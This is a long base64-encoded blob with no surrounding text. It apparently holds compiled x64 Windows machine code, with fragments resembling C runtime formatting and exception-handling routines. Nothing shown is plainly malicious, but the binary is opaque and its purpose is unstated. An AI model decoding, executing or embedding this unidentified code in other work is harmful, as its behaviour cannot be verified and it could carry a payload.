QYtASEGLUvzT6gPCTYlQCEmJQDDDRCLJQYD5IHVcQQ+2CkGLUEiD4Q9KD76EGWDoAgBCiowZcOgCAEwr0EGLQvzT6E2JUAiNDAJJiUgwQQ+2CoPhD0oPvoQZYOgCAEKKjBlw6AIATCvQQYtC/NPoTYlQCI0MAkmJSDjDSIlcJAhXSIPsIEyLCUmL2EGDIABBuGNzbeBFOQF1WkGDeRgEvwEAAABBuiAFkxl1G0GLQSBBK8KD+AJ3D0iLQihJOUEoiwsPRM+JC0U5AXUoQYN5GAR1IUGLSSBBK8qD+QJ3FUmDeTAAdQ7oFNf//4l4QIvHiTvrAjPASItcJDBIg8QgX8PMzEiJXCQIV0iD7CBBi/hNi8HoY////4vYhcB1COjc1v//iXh4i8NIi1wkMEiDxCBfw0SJTCQgTIlEJBhIiUwkCFNWV0FUQVVBVkFXSIPsMEWL4UmL8EiL2kyL+eihw///TIvoSIlEJChMi8ZIi9NJi8/oH9j//4v46IDW////QDCD//8PhOsAAABBO/wPjuIAAACD//8PjhQBAAA7fgQPjQsBAABMY/foVcP//0hjTghKjQTwizwBiXwkIOhBw///SGNOCEqNBPCDfAEEAHQc6C3D//9IY04ISo0E8EhjXAEE6BvD//9IA8PrAjPASIXAdFlEi8dIi9ZJi8/o6df//+j8wv//SGNOCEqNBPCDfAEEAHQc6OjC//9IY04ISo0E8EhjXAEE6NbC//9IA8PrAjPAQbgDAQAASYvXSIvI6M4LAABJi83o3sL//+seRIukJIgAAABIi7QkgAAAAEyLfCRwTItsJCiLfCQgiXwkJOkM////6ITV//+DeDAAfgjoedX///9IMIP//3QFQTv8fyREi8dIi9ZJi8/oStf//0iDxDBBX0FeQV1BXF9eW8PoqWQAAJDoo2QAAJDMzEiLxFNWV0FUQVVBVkFXSIHsAAEAAA8pcLhIiwXsNgMASDPESImEJOAAAABFi+lJi9hIi/JMi+FIiUwkcEiJTCRgRIlMJEjo+cH//0iJRCRoSIvWSIvL6CHX//+L+EyNdkhMiXQkeEGDPgB0F+jP1P//g3h4/g+FeAIAAEGLPoPvAusf6LjU//+DeHj+dBTordT//4t4eOil1P//x0B4/v///+iZ1P///0AwSIPGCEiJtCSAAAAAg3sIAHQ/SGNTCEgDFg+2CoPhD0yNBSQm//9KD76EAWDoAgBCD7aMAXDoAgBIK9CLQvzT6ImEJMAAAABIiZQkyAAAAOsQg6QkwAAAAABIi5QkyAAAAEiNhCTAAAAASIlEJDBIiVQkOEiNhCTAAAAASIlEJFBIiVQkWEiNRCRQSIlEJCBMjUwkMEWLxYvXSI2MJMAAAADodAQAAJBIjYQkwAAAAEiJhCSYAAAASIuEJMgAAABIiYQkoAAAAEyLfCQ4TDv4D4I2AQAATDt8JFgPhisBAABIjVQkOEiLTCQw6HMDAABMiXwkOEiLXCQwDxBzEA8RtCSIAAAADyhEJDBmD3+EJLAAAABIjVQkOEiLy+hCAwAAi0MQTCv4TIl8JDhIjUQkMEiJRCQgRIvPTI2EJLAAAABBi9VIjUwkUOidBAAAi/iJRCREg2QkQABFM8lmD2/GZg9z2AhmD37AZg9z3gRmD37xhclED0XIRIlMJEBFhckPhIEAAACNRwJBiQaNQf+D+AF2FkljyUgDDkG4AwEAAEmL1OgDCQAA6zZIi0QkYEiLEIP5AnUNi4QklAAAAEyLBBDrC0SLhCSUAAAATAPCSWPJSAMOQbkDAQAA6HsJAABIi0wkaOjZv///6xuLfCRETItkJHBMi3QkeEiLtCSAAAAARItsJEjpnP7//+iG0v//g3gwAH4I6HvS////SDBIi4wk4AAAAEgzzOispf//Dyi0JPAAAABIgcQAAQAAQV9BXkFdQVxfXlvD6KhhAACQzMzMSIlcJAhIiWwkEEiJdCQYV0iD7CBIi+lJi/hJi8hIi/LoU9T//0yNTCRITIvHSIvWSIvNi9jo+rb//0yLx0iL1kiLzei80///O9h+I0SLw0iNTCRISIvX6NTT//9Ei8tMi8dIi9ZIi83oz9P//+sQTIvHSIvWSIvN6IfT//+L2EiLbCQ4i8NIi1wkMEiLdCRASIPEIF/DzMxIiVwkCEiJbCQYSIl0JCBXQVRBVUFWQVdIg+wgSIvqTIvpSIXSD4S8AAAARTL/M/Y5Mg+OjwAAAOiHvv//SIvQSYtFMExjYAxJg8QETAPi6HC+//9Ii9BJi0UwSGNIDESLNApFhfZ+VEhjxkiNBIBIiUQkWOhLvv//SYtdMEiL+EljBCRIA/joJL7//0iLVCRYTIvDSGNNBEiNBJBIi9dIA8joser//4XAdQ5B/85Jg8QERYX2f73rA0G3Af/GO3UAD4xx////SItcJFBBisdIi2wkYEiLdCRoSIPEIEFfQV5BXUFcX8PoIGAAAMzMzMxIiVwkCEiJbCQQSIl0JBhXSIPsIDPtSIv5OSl+UDP26Jy9//9IY08ESAPGg3wBBAB0G+iJvf//SGNPBEgDxkhjXAEE6Hi9//9IA8PrAjPASI1ICEiNFcY+AwDoFdD//4XAdCH/xUiDxhQ7L3yyMsBIi1wkMEiLbCQ4SIt0JEBIg8QgX8OwAevnTIsCTI0d3iH//0yL0UyLykEPtgiD4Q9KD76EGWDoAgBCiowZcOgCAEwrwEGLQPzT6IvITIkCg+EDwegCQYlCEEGJShSNQf+D+AF2FoP5A3VKSIsCiwhIg8AESIkCQYlKGMNIiwKLCEiDwARIiQJBiUoYSIsSD7YKg+EPSg++hBlg6AIAQoqMGXDoAgBIK9CLQvzT6EmJEUGJQhzDSIvCSYvQSP/gzMzMSYvATIvSSIvQRYvBSf/izEyL3EmJWxhNiUsgiVQkEFVWV0FUQVVBVkFXSIPsIEiLQQhAMu1FMvZJiUMIM/9Ni+FFi+hIi9lIjXD/TIv+OTl+Q0WLYxBBO/x1BkiL8EC1AUE7/XUGTIv4QbYBQITtdAVFhPZ1GkiNVCRgSIvL6NX+////xzs7fQdIi0QkYOvGTItkJHhJiwQkSYl0JAgPEAMPEQAPEEsQDxFIEEiLhCSAAAAASIsITIl4CA8QAw8RAQ8QSxBIi1wkcA8RSRBIg8QgQV9BXkFdQVxfXl3DzMxIiVwkCEiJdCQQV0iD7DBIi3wkYIvaSYvwTIvRSItXCEk7UAgPh44AAABIOVEID4eEAAAASYtACEiLykkrSghIK8JIO8h9NkEPEAIPEUQkIGYPc9gIZkgPfsBIO9B2VUiLTCQgSI1UJCjoCv7//0iLRCQo/8NIOUcId+TrNw8QB0GL2Q8RRCQgZg9z2AhmSA9+wEk5QAh2HEiLTCQgSI1UJCjo0f3//0iLTCQo/8tIOU4Id+SLw+sDg8j/SItcJEBIi3QkSEiDxDBfw8zMzMzMzMzMzMzMZmYPH4QAAAAAAEiJTCQISIlUJBhEiUQkEEnHwSAFkxnrCMzMzMzMzGaQw8zMzMzMzGYPH4QAAAAAAMPMzMxIiwU98gEASI0VwoX//0g7wnQjZUiLBCUwAAAASIuJmAAAAEg7SBByBkg7SAh2B7kNAAAAzSnDzEBTSIPsIDPbSI0VfUwDAEUzwEiNDJtIjQzKuqAPAADo2AIAAIXAdBH/BYZMAwD/w4P7AXLTsAHrB+gKAAAAMsBIg8QgW8PMzEBTSIPsIIsdYEwDAOsdSI0FL0wDAP/LSI0Mm0iNDMj/FU/vAQD/DUFMAwCF23XfsAFIg8QgW8PMSIlcJAhIiWwkEEiJdCQYV0FUQVVBVkFXSIPsIIv5TI09bx7//0mDzv9Ni+FJi+hMi+pJi4T/KC4EAJBJO8YPhOsAAABIhcAPheQAAABNO8EPhNEAAACLdQBJi5z3EC4EAJBIhdt0C0k73g+FmQAAAOtrTYu898D3AgAz0kmLz0G4AAgAAP8Vqe8BAEiL2EiFwHVW/xUj7gEAg/hXdS1EjUMHSYvPSI0VWBYCAOhzuQAAhcB0FkUzwDPSSYvP/xVx7wEASIvYSIXAdR5Ji8ZMjT2/Hf//SYeE9xAuBABIg8UESTvs6Wf///9Ii8NMjT2hHf//SYeE9xAuBABIhcB0CUiLy/8VI+8BAEmL1UiLy/8Vt+0BAEiFwHQNSIvISYeM/yguBADrCk2HtP8oLgQAM8BIi1wkUEiLbCRYSIt0JGBIg8QgQV9BXkFdQVxfw8zMQFNIg+wgSIvZTI0NvBUCADPJTI0FqxUCAEiNFawVAgDoi/7//0iFwHQPSIvLSIPEIFtI/yUT8AEASIPEIFtI/yV37gEAzMzMQFNIg+wgi9lMjQ2NFQIAuQEAAABMjQV5FQIASI0VehUCAOhB/v//i8tIhcB0DEiDxCBbSP8lyu8BAEiDxCBbSP8lRu4BAMzMQFNIg+wgi9lMjQ1VFQIAuQIAAABMjQVBFQIASI0VQhUCAOj5/f//i8tIhcB0DEiDxCBbSP8lgu8BAEiDxCBbSP8l7u0BAMzMSIlcJAhXSIPsIEiL2kyNDSAVAgCL+UiNFRcVAgC5AwAAAEyNBQMVAgDoqv3//0iL04vPSIXAdAj/FTbvAQDrBv8Vru0BAEiLXCQwSIPEIF/DzMzMSIlcJAhIiXQkEFdIg+wgQYvwTI0N3xQCAIvaTI0FzhQCAEiL+UiNFcwUAgC5BAAAAOhO/f//i9NIi89IhcB0C0SLxv8V1+4BAOsG/xU37QEASItcJDBIi3QkOEiDxCBfw8zMzMzMzMzMzMzMzMxmZg8fhAAAAAAASIPsKEiJTCQwSIlUJDhEiUQkQEiLEkiLwegC/P///9DoK/z//0iLyEiLVCQ4SIsSQbgCAAAA6OX7//9Ig8Qow8zMzMzMzGZmDx+EAAAAAABIg+woSIlMJDBIiVQkOESJRCRASIsSSIvB6LL7////0Ojb+///SIPEKMPMzMzMzMxIg+woSIlMJDBIiVQkOEiLVCQ4SIsSQbgCAAAA6H/7//9Ig8Qow8zMzMzMzA8fQABIg+woSIlMJDBIiVQkOEyJRCRARIlMJEhFi8FIi8HoTfv//0iLTCRA/9Docfv//0iLyEiLVCQ4QbgCAAAA6C77//9Ig8Qow8zpX7YAAMzMzEiLxEiJWAhIiWgQSIlwGEiJeCBBVkiD7CCLBdFIAwAz278DAAAAhcB1B7gAAgAA6wU7xw9Mx0hjyLoIAAAAiQWsSAMA6BO2AAAzyUiJBaZIAwDofbYAAEg5HZpIAwB1L7oIAAAAiT2FSAMASIvP6Om1AAAzyUiJBXxIAwDoU7YAAEg5HXBIAwB1BYPI/+t1SIvrSI01fyoDAEyNNWAqAwBJjU4wRTPAuqAPAADo87wAAEiLBUBIAwBMjQUhTgMASIvVSMH6BkyJNANIi8WD4D9IjQzASYsE0EiLTMgoSIPBAkiD+QJ3BscG/v///0j/xUmDxlhIg8MISIPGWEiD7wF1njPASItcJDBIi2wkOEiLdCRASIt8JEhIg8QgQV7DzIvBSI0N1ykDAEhrwFhIA8HDzMzMQFNIg+wg6C07AADovMAAADPbSIsNq0cDAEiLDAvoXsEAAEiLBZtHAwBIiwwDSIPBMP8V3ekBAEiDwwhIg/sYddFIiw18RwMA6FO1AABIgyVvRwMAAEiDxCBbw8xIg+woSIXJdRfojlYAAMcAFgAAAOh7NQAAuBYAAADrIkiF0nQHSI1BCEiJAk2FwHQDSYkITYXJdAdIjUEQSYkBM8BIg8Qow8xIg8EwSP8lTekBAMxIg8EwSP8lSekBAMxIg+xYSIsFvSgDAEgzxEiJRCRARTPJTIvCQYvBTIvRSIP4IEWNWQFzcUSITAQgSQPDSIP4IHzwigLrHw+20EjB6gMPtsCD4AcPtkwUIA+rwU0Dw4hMFCBBigCEwHXdRAhcJCDrBkUDy00D00UPtgJBi9NBi8hJwegDg+EH0+JChFQEIHTgSWPBSItMJEBIM8zoq5n//0iDxFjD6Fmh///MSIlsJBBIiXQkGFdIg+wgTIvaSI0t9xf//0GD4w9Ii/JJK/NIi/pMi8EPV9tJjUP/8w9vDkiD+A53c4uEhQTrAABIA8X/4GYPc9kB62BmD3PZAutZZg9z2QPrUmYPc9kE60tmD3PZBetEZg9z2QbrPWYPc9kH6zZmD3PZCOsvZg9z2QnrKGYPc9kK6yFmD3PZC+saZg9z2QzrE2YPc9kN6wxmD3PZDusFZg9z2Q8z0g9XwGYPdMFmD9fARI1SD4XAD4RAAQAARA+8yEiJXCQwTYXbdQWNWgHrE7kQAAAAQYvBSSvLi9pIO8EPksNBi8JBK8FBO8IPh88AAACLjIVA6wAASAPN/+FmD3P5AWYPc9kB6bQAAABmD3P5AmYPc9kC6aUAAABmD3P5A2YPc9kD6ZYAAABmD3P5BGYPc9kE6YcAAABmD3P5BWYPc9kF63tmD3P5BmYPc9kG629mD3P5B2YPc9kH62NmD3P5CGYPc9kI61dmD3P5CWYPc9kJ60tmD3P5CmYPc9kK6z9mD3P5C2YPc9kL6zNmD3P5DGYPc9kM6ydmD3P5DWYPc9kN6xtmD3P5DmYPc9kO6w9mD3P5D2YPc9kP6wMPV8mF20iLXCQwD4XwAAAA8w9vVhBmD2/CZg90w2YP18CFwHU/SIvXSYvISItsJDhIi3QkQEiDxCBf6Vr9//9Nhdt1zDhWAQ+EswAAAEiL10iLbCQ4SIt0JEBIg8QgX+k1/f//D7zIi8FJK8NIg8AQSIP4EHevRCvRQYP6D3d5QouMlYDrAABIA83/4WYPc/oB62VmD3P6AuteZg9z+gPrV2YPc/oE61BmD3P6BetJZg9z+gbrQmYPc/oH6ztmD3P6COs0Zg9z+gnrLWYPc/oK6yZmD3P6C+sfZg9z+gzrGGYPc/oN6xFmD3P6DusKZg9z+g/rAw9X0mYP69FmD2/KQQ+2AITAdDCQD77AZg9uwGYPYMBmD2DAZg9wwABmD3TBZg/XyIXJdQ9BD7ZAAUn/wEj/woTAddFIi2wkOEiLwkiLdCRASIPEIF/DZpA26AAAPegAAEToAABL6AAAUugAAFnoAABg6AAAZ+gAAG7oAAB16AAAfOgAAIPoAACK6AAAkegAAJjoAAD36AAABukAABXpAAAk6QAAM+kAAD/pAABL6QAAV+kAAGPpAABv6QAAe+kAAIfpAACT6QAAn+kAAKvpAAC36QAAQ+oAAErqAABR6gAAWOoAAF/qAABm6gAAbeoAAHTqAAB76gAAguoAAInqAACQ6gAAl+oAAJ7qAACl6gAArOoAAEiJXCQITIlMJCBXSIPsIEmL2UmL+EiLCuhb+///kEiLz+haBQAAi/hIiwvoVPv//4vHSItcJDBIg8QgX8PMzMxAVVNWV0FUQVZBV0iNrCQQ/P//SIHs8AQAAEiLBfcjAwBIM8RIiYXgAwAARTPkSYvZSYv4SIvyTIv5TYXJdRjoSFEAAMcAFgAAAOg1MAAAg8j/6TMBAABIhf90BUiF9nTeSIuVUAQAAEiNTCRA6B4EAABNi/dEiWQkOWZEiWQkPUSIZCQ/SIl0JCBIiXwkKEyJZCQwQYPmAnUKRIhkJDhIhfZ1BcZEJDgBSI1EJCBMiWQkcEiJhcgDAABIjUwkYEiNRCRITIlliEiJRCRoSIuFWAQAAEiJRYBMiWWQRIllmGZEiWWgRIllsESIZbRMiaW4AwAATImlwAMAAEyJfCRgSIlcJHhEiaXQAwAA6C8JAABIY9hIhfZ0SUH2xwF0IkiF/3UIhcAPhYQAAABIi0QkMEg7x3Uohdt4KEg733Yj629NhfZ0ZUiF/3QXhcB5BUSIJusOSItEJDBIO8d0ZkSIJAZIi43AAwAA6MauAABMiaXAAwAARDhkJFh0DEiLTCRAg6GoAwAA/YvDSIuN4AMAAEgzzOj3k///SIHE8AQAAEFfQV5BXF9eW13DSIX/dQWDy//rrUiLRCQwSDvHdZ+7/v///0SIZDf/65fMSIlcJAhIiWwkEEiJdCQYV0iD7CBIuP////////9/SIv5SDvQdg/olU8AAMcADAAAADLA61wz9kiNLBJIObEIBAAAdQlIgf0ABAAAdglIO6kABAAAdwSwAes3SIvN6J68AABIi9hIhcB0HUiLjwgEAADo8q0AAEiJnwgEAABAtgFIia8ABAAAM8no2q0AAECKxkiLXCQwSItsJDhIi3QkQEiDxCBfw8zMSIlcJAhMjVFYQYvYSYuCCAQAAESL2kiFwHUHuAACAADrDUyL0EiLgVgEAABI0ehNjUL/TAPATIlBSItBOIXAfwVFhdt0L//IM9KJQThBi8P384DCMESL2ID6OX4MQYrBNAHA4AUEBwLQSItBSIgQSP9JSOvFRCtBSEiLXCQIRIlBUEj/QUjDzEiJXCQISIuBYAQAAEyL0UiDwVhBi9hMi9pIhcB1B7gAAgAA6w1Ii8hJi4JYBAAASNHoTI1B/0wDwE2JQkhBi0I4hcB/BU2F23Qx/8gz0kGJQjhJi8NI9/OAwjBMi9iA+jl+DEGKwTQBwOAFBAcC0EmLQkiIEEn/SkjrwkUrQkhIi1wkCEWJQlBJ/0JIw8zMzEWFwA+OgQAAAEiLxEiJWAhIiWgQSIlwGEiJeCBBVkiD7CBJi9lED77yQYvoSIvxM/9IiwaLSBTB6Qz2wQF0CkiLBkiDeAgAdBBIixZBi87o9DMAAIP4/3QG/wOLA+sGgwv/g8j/g/j/dAb/xzv9fMFIi1wkMEiLbCQ4SIt0JEBIi3wkSEiDxCBBXsPMRYXAfm9IiVwkCEiJfCQQRYsRQIr6SIvZRTPbSIsTSItCCEg5QhB1FIB6GAB0BUH/wusEQYPK/0WJEesgQY1CAUGJAUiLA0j/QBBIiwNIiwhAiDlIiwNI/wBFixFBg/r/dAhB/8NFO9h8sUiLXCQISIt8JBDDzMzMSIlcJAhIiXQkEFdIg+wgxkEYAEiL+UiNcQhIhdJ0BQ8QAusQgz2FQQMAAHUNDxAFNCMDAPMPfwbrTuglwQAASIkHSIvWSIuIkAAAAEiJDkiLiIgAAABIiU8QSIvI6KrDAABIiw9IjVcQ6NLDAABIiw+LgagDAACoAnUNg8gCiYGoAwAAxkcYAUiLXCQwSIvHSIt0JDhIg8QgX8PMgHkYAHQKSIsBg6CoAwAA/cPMzMxIiVwkEEiJdCQYVVdBVkiNrCQw/P//SIHs0AQAAEiLBbQeAwBIM8RIiYXAAwAASIsBSIvZSIs4SIvP6FHRAABIi1MISI1MJCBAivBIixLo/f7//0iLUyBIjUQkKEiLC0Uz9kyLEkiLCUiLUxhMiwpIi1MQTIsCSImNqAMAAEiNTCRATIl0JFBMiXQkaEyJdCRwRIl0JHhmRIl1gESJdZBEiHWUTIm1mAMAAEyJtaADAABMiUQkQEiJRCRITIlMJFhMiVQkYESJtbADAADoGwIAAEiLjaADAACL2OgVqgAATIm1oAMAAEQ4dCQ4dAxIi0wkIIOhqAMAAP1Ii9dAis7oVNEAAIvDSIuNwAMAAEgzzOg7j///TI2cJNAEAABJi1soSYtzMEmL40FeX13DzMzMSIsCSIuQ+AAAAEiLAkQPtggPtgGEwHQeD7bQDx9EAAAPtsJBOtF0Dg+2QQFI/8EPttCEwHXqSP/BhMB0VQ+2AYTAdBEsRajfdAsPtkEBSP/BhMB17w+2Qf9Mi8FI/8k8MHULD7ZB/0j/yTwwdPVBOsFIjVH/SA9F0Q8fgAAAAABBD7YASI1SAYgCTY1AAYTAde7DzMzMzMzMzMzMzMzMzEyLCkQPtgFJi5EQAQAAQYA8EGV0GkmLAQ8fhAAAAAAARA+2QQFI/8FC9gRABHXxQQ+2wIA8EHh1BUQPtkECSYuB+AAAAEiNUQJID0XRSIsID7YBiAJIjUIBDx+AAAAAAA+2CEEPttBEiABIjUABRA+2wYTSderDzEiJXCQQSIlsJBhWV0FWSIPsIEiLWRBMi/JIi/lIhdt1DOjeSQAASIvYSIlHEIsrSI1UJECDIwC+AQAAAEiLTxhIg2QkQABIK85EjUYJ6FK3AABBiQZIi0cQSIXAdQnooUkAAEiJRxCDOCJ0EUiLRCRASDtHGHIGSIlHGOsDQDL2gzsAdQaF7XQCiStIi1wkSECKxkiLbCRQSIPEIEFeX17DzMzMSIlcJAhIiXwkEEFWSIPsIEiL2YPP/0iLiWgEAABIhcl1I+g5SQAAxwAWAAAA6CYoAACLx0iLXCQwSIt8JDhIg8QgQV7D6NoTAACEwHTkSIN7GAB1FegGSQAAxwAWAAAA6PMnAACDyP/ryv+DcAQAAIO7cAQAAAIPhI4BAABMjTVQBAIAg2NQAINjLADpUgEAAEj/QxiDeygAD4xZAQAASA++U0GNQuA8WncOSI1C4IPgf0GLTMYE6wIzyYtDLI0MyIPhf0GLBM6JQyyD+AgPhE7///+FwA+E9wAAAIPoAQ+E1QAAAIPoAQ+ElwAAAIPoAXRng+gBdFmD6AF0KIPoAXQWg/gBD4Un////SIvL6CUIAADpwwAAAEiLy+g4BQAA6bYAAACA+ip0EUiNUzhIi8voJv7//+mgAAAASINDIAhIi0Mgi0j4hckPSM+JSzjrMINjOADpiQAAAID6KnQGSI1TNOvJSINDIAhIi0Mgi0j4iUs0hcl5CYNLMAT32YlLNLAB61aKwoD6IHQoPCN0HjwrdBQ8LXQKPDB1R4NLMAjrQYNLMATrO4NLMAHrNYNLMCDrL4NLMALrKYNjNACDYzAAg2M8AMZDQACJezjGQ1QA6xBIi8voTQIAAITAD4RP/v//SItDGIoIiEtBhMkPhZ3+//9I/0MY/4NwBAAAg7twBAAAAg+Fef7//4tDKOkh/v//zEiJXCQISIl0JBBIiXwkGEFWSIPsIIPP/zP2SIvZSDmxaAQAAA+E1QEAAEg5cRh1F+gXRwAAxwAWAAAA6AQmAAALx+miAQAA/4FwBAAAg7lwBAAAAg+EjAEAAEyNNV8GAgCJc1CJcyzpRwEAAEj/Qxg5cygPjE8BAABID75TQY1C4Dxadw5IjULgg+B/QYtMxgTrAovOjQTJA0Msg+B/QYsMxolLLIP5CA+EUQEAAIXJD4TxAAAAg+kBD4TUAAAAg+kBD4SWAAAAg+kBdGaD6QF0WYPpAXQog+kBdBaD+QEPhSoBAABIi8vouwgAAOm9AAAASIvL6LoEAADpsAAAAID6KnQRSI1TOEiLy+g4/P//6ZoAAABIg0MgCEiLQyCLSPiFyQ9Iz4lLOOsviXM46YAAAACA+ip0BkiNUzTrykiDQyAISItDIItI+IlLNIXJeQmDSzAE99mJSzSwAetRisKA+iB0KDwjdB48K3QUPC10CjwwdT6DSzAI6ziDSzAE6zKDSzAB6yyDSzAg6yaDSzAC6yBIiXMwQIhzQIl7OIlzPECIc1TrDEiLy+jVAAAAhMB0XEiLQxiKCIhLQYTJD4Wo/v//SP9DGDlzLHQGg3ssB3Us/4NwBAAAg7twBAAAAg+Fe/7//4tDKEiLXCQwSIt0JDhIi3wkQEiDxCBBXsPoSEUAAMcAFgAAAOg1JAAAi8fr1sxAU0iD7CAz0kiL2ejUAAAAhMB0REiLg2gEAAAPvlNBi0gUwekM9sEBdA5Ii4NoBAAASIN4CAB0E4vKSIuTaAQAAOg6KwAAg/j/dAX/QyjrBINLKP+wAesS6NtEAADHABYAAADoyCMAADLASIPEIFvDQFNIg+wgM9JIi9noCAEAAITAdEhIi4toBAAARIpDQUiLQQhIOUEQdRGAeRgAdAX/QyjrJINLKP/rHv9DKEj/QRBIi4toBAAASIsRRIgCSIuLaAQAAEj/AbAB6xLoZ0QAAMcAFgAAAOhUIwAAMsBIg8QgW8NAU0iD7CBMD75BQUiL2cZBVABBg/j/fBdIi0EISIsASIsAQg+3DECB4QCAAADrAjPJhcl0ZUiLg2gEAACLUBTB6gz2wgF0DkiLg2gEAABIg3gIAHQUSIuTaAQAAEGLyOg4KgAAg/j/dAX/QyjrBINLKP9Ii0MYighI/8CIS0FIiUMYhMl1FOjJQwAAxwAWAAAA6LYiAAAywOsCsAFIg8QgW8PMzEiD7ChMD75JQUyLwcZBVABBg/n/fBdIi0EISIsASIsAQg+3DEiB4QCAAADrAjPJhcl0bEmLiGgEAABIi0EISDlBEHUTgHkYAHQGQf9AKOsmQYNIKP/rH0H/QChI/0EQSYuAaAQAAEiLCESICUmLgGgEAABI/wBJi0AYighI/8BBiEhBSYlAGITJdRToIEMAAMcAFgAAAOgNIgAAMsDrArABSIPEKMPMzEiD7CiKQUE8RnUZ9gEID4VSAQAAx0EsBwAAAEiDxCjpvAIAADxOdSf2AQgPhTUBAADHQSwIAAAA6MtCAADHABYAAADouCEAADLA6RkBAACDeTwAdeM8SQ+EsAAAADxMD4SfAAAAPFQPhI4AAAA8aHRsPGp0XDxsdDQ8dHQkPHd0FDx6D4XdAAAAx0E8BgAAAOnRAAAAx0E8DAAAAOnFAAAAx0E8BwAAAOm5AAAASItBGIA4bHUOSP/ASIlBGLgEAAAA6wW4AwAAAIlBPOmVAAAAx0E8BQAAAOmJAAAASItBGIA4aHUOSP/ASIlBGLgBAAAA69W4AgAAAOvOx0E8DQAAAOtix0E8CAAAAOtZSItRGIoCPDN1F4B6ATJ1EUiNQgLHQTwKAAAASIlBGOs4PDZ1F4B6ATR1EUiNQgLHQTwLAAAASIlBGOsdLFg8IHcXSLoBEIIgAQAAAEgPo8JzB8dBPAkAAACwAUiDxCjDzMzMSIPsKIpBQTxGdRn2AQgPhVIBAADHQSwHAAAASIPEKOnQAwAAPE51J/YBCA+FNQEAAMdBLAgAAADoW0EAAMcAFgAAAOhIIAAAMsDpGQEAAIN5PAB14zxJD4SwAAAAPEwPhJ8AAAA8VA+EjgAAADxodGw8anRcPGx0NDx0dCQ8d3QUPHoPhd0AAADHQTwGAAAA6dEAAADHQTwMAAAA6cUAAADHQTwHAAAA6bkAAABIi0EYgDhsdQ5I/8BIiUEYuAQAAADrBbgDAAAAiUE86ZUAAADHQTwFAAAA6YkAAABIi0EYgDhodQ5I/8BIiUEYuAEAAADr1bgCAAAA687HQTwNAAAA62LHQTwIAAAA61lIi1EYigI8M3UXgHoBMnURSI1CAsdBPAoAAABIiUEY6zg8NnUXgHoBNHURSI1CAsdBPAsAAABIiUEY6x0sWDwgdxdIugEQgiABAAAASA+jwnMHx0E8CQAAALABSIPEKMPMzMxIiVwkEEiJbCQYSIl0JCBXQVZBV0iD7DCKQUFIi9lBvwEAAABAtnhAtVhBtkE8ZH9WD4S8AAAAQTrGD4TGAAAAPEN0LTxED47DAAAAPEcPjrIAAAA8U3RXQDrFdGc8WnQcPGEPhJ0AAAA8Yw+FngAAADPS6AwHAADpjgAAAOjSBAAA6YQAAAA8Z357PGl0ZDxudFk8b3Q3PHB0GzxzdBA8dXRUQDrGdWe6EAAAAOtN6KAJAADrVcdBOBAAAADHQTwLAAAARYrHuhAAAADrMYtJMIvBwegFQYTHdAcPuukHiUswuggAAABIi8vrEOjbCAAA6xiDSTAQugoAAABFM8DoSAcAAOsF6L0EAACEwHUHMsDpVQEAAIB7QAAPhUgBAACLUzAzwGaJRCRQM/+IRCRSi8LB6ARBhMd0LovCwegGQYTHdAfGRCRQLesaQYTXdAfGRCRQK+sOi8LR6EGEx3QIxkQkUCBJi/+KS0GKwUAqxajfdQ+LwsHoBUGEx3QFRYrH6wNFMsCKwUEqxqjfD5TARYTAdQSEwHQbxkQ8UDBAOs10BUE6znUDQIr1QIh0PFFIg8cCi2s0K2tQK+/2wgx1FUyNSyhEi8VIjYtoBAAAsiDoUvD//0yNs2gEAABJiwZIjXMoi0gUwekMQYTPdA5JiwZIg3gIAHUEAT7rHEiNQxBMi85Ei8dIiUQkIEiNVCRQSYvO6BMMAACLSzCLwcHoA0GEx3QYwekCQYTPdRBMi85Ei8WyMEmLzujq7///M9JIi8voQAkAAIM+AHwbi0swwekCQYTPdBBMi85Ei8WyIEmLzujA7///QYrHSItcJFhIi2wkYEiLdCRoSIPEMEFfQV5fw0iJXCQQSIlsJBhIiXQkIFdBVkFXSIPsMIpBQUiL2UG/AQAAAEC2eEC1WEG2QTxkf1YPhLwAAABBOsYPhMYAAAA8Q3QtPEQPjsMAAAA8Rw+OsgAAADxTdFdAOsV0ZzxadBw8YQ+EnQAAADxjD4WeAAAAM9LoiAQAAOmOAAAA6E4CAADphAAAADxnfns8aXRkPG50WTxvdDc8cHQbPHN0EDx1dFRAOsZ1Z7oQAAAA603oHAcAAOtVx0E4EAAAAMdBPAsAAABFise6EAAAAOsxi0kwi8HB6AVBhMd0Bw+66QeJSzC6CAAAAEiLy+sQ6FcGAADrGINJMBC6CgAAAEUzwOjEBAAA6wXoOQIAAITAdQcywOk3AQAAgHtAAA+FKgEAAItTMDPAZolEJFAz/4hEJFKLwsHoBEGEx3Qui8LB6AZBhMd0B8ZEJFAt6xpBhNd0B8ZEJFAr6w6LwtHoQYTHdAjGRCRQIEmL/4pLQYrBQCrFqN91D4vCwegFQYTHdAVFisfrA0UywIrBQSrGqN8PlMBFhMB1BITAdBvGRDxQMEA6zXQFQTrOdQNAivVAiHQ8UUiDxwKLczRIjWsoK3NQTI2zaAQAACv39sIMdRBMi81Ei8ayIEmLzuhU7v//SI1DEEyLzUSLx0iJRCQgSI1UJFBJi87oDAkAAItLMIvBwegDQYTHdBjB6QJBhM91EEyLzUSLxrIwSYvO6BPu//8z0kiLy+gBCAAAg30AAHwdRItTMEHB6gJFhNd0EEyLzUSLxrIgSYvO6Obt//9BisdIi1wkWEiLbCRgSIt0JGhIg8QwQV9BXl/DzMyD+Qt3LkhjwUiNFaH9/v+LjIKIAgEASAPK/+G4AQAAAMO4AgAAAMO4BAAAAMO4CAAAAMMzwMNmkHcCAQBrAgEAcQIBAHcCAQB9AgEAfQIBAH0CAQB9AgEAgwIBAH0CAQB3AgEAfQIBAEiDQSAISItBIEyLQPhNhcB0R02LSAhNhcl0PotRPIPqAnQgg+oBdBeD+gl0EoN5PA10EIpBQSxjqO8PlcLrBrIB6wIy0kyJSUhBD7cAhNJ0GMZBVAHR6OsUSI0V+P0BALgGAAAASIlRSMZBVACJQVCwAcPMSIlcJBBXSIPsUINJMBBIi9mLQTiFwHkWikFBLEEk3/bYG8CD4PmDwA2JQTjrHHUagHlBZ3QIM8CAeUFHdQzHQTgBAAAAuAEAAABIjXlYBV0BAABIY9BIi8/oQur//0G4AAIAAITAdSFIg7tgBAAAAHUFQYvA6wpIi4NYBAAASNHoBaP+//+JQzhIi4cIBAAASIXASA9Ex0iJQ0hIg0MgCEiLQyBIi4tgBAAA8g8QQPjyDxFEJGBIhcl1BUmL0OsKSIuTWAQAAEjR6kiFyXUJTI2LWAIAAOsaTIuLWAQAAEiL+UyLg1gEAABJ0elMA8lJ0ehIi0MID75LQcdEJEgBAAAASIlEJEBIiwNIi